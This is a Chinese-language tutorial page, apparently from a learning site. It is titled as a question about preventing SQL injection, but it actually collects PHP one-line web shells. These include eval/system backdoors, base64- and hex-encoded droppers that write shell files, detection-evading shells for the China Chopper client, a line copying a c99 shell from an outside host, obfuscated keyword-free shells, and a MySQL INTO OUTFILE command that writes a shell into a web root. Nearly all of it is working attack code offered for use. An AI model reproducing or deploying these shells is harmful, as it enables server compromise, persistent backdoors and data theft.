php提供哪些函数来避免sql的注入
PHP与SQL语句写一句话木马总结一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来:
|
<?php @ eval ( $_GET [ "code" ])?> <?php @system( $_POST [ "cmd" ])?> |
二、编码的替换的类型:
|
<?php @ fputs ( fopen ( base64_decode ( 'bG9zdC5waHA=' ),w), base64_decode ( 'PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==' ));?> //会生成<?php @eval($_POST['lostwolf']);?> <script language= "php" >@ fputs ( fopen ( base64_decode ( 'bG9zdC5waHA=' ),w), base64_decode ( 'PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==' ));</script> //php在html内部的一种嵌入方式 <?php fputs ( fopen (pack( "H*" , "6c6f7374776f6c662e706870" ), "w" ),pack( "H*" , "3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e" ))?> <?php session_start(); $_POST [ 'code' ] && $_SESSION [ 'theCode' ] = trim( $_POST [ 'code' ]); $_SESSION [ 'theCode' ]&&preg_replace( '\'a\'eis' , 'e' . 'v' . 'a' . 'l' . '(base64_decode($_SESSION[\'theCode\']))' , 'a' );?> |
三、其他类型:
|
<?php $_GET [a]( $_GET [b]);?> //?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29}; <?php assert( $_REQUEST [ "pass" ]);?> //菜刀连接 躲避检测 密码pass <?php substr (md5( $_REQUEST [ 'x' ]),28)== 'acd0' && eval ( $_REQUEST [ 'pass' ]);?> //菜刀提交 http://192.168.1.5/x.php?x=lostwolf 脚本类型:php 密码为 pass |
四、下载类型:
|
<?php echo copy ( "http://www.r57.me/c99.txt" , "lostwolf.php" ); ?> <? echo file_get_contents ( "..//cfg_database.php" );?> //显示某文件 <? eval ( file_get_contents ( "远程shell" )) ?> //运行远程shell |
五、无关键函数类型:
|
<?php $_ = "" ; $_ [+ "" ]= '' ; $_ = "$_" . "" ; $_ =( $_ [+ "" ]| "" ).( $_ [+ "" ]| "" ).( $_ [+ "" ]^ "" ); ?> <?php ${ '_' . $_ }[ '_' ](${ '_' . $_ }[ '__' ]);?> http: //site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass <? $_ = "" ; $_ [+ "" ]= '_' ; $_ = "$_" . "" ; $_ =( $_ [+ "" ]| "" ).( $_ [+ "" ]| "" ).( $_ [+ "" ]^ "" );?> |
六、补充知识点:
SQL写一句话(MySQL):
|
select "<?php @system($_POST[" pass "]);?>" into outfile "/home/webaccount/projectname/www/*.php" #前面是一句话内容 后面是绝对路径www下的PHP文件,同理其他脚本也可以 |
以上就是PHP一句话木马小结与SQL语句写一句话木马的详细内容,感谢大家的学习和对开心学习网的支持。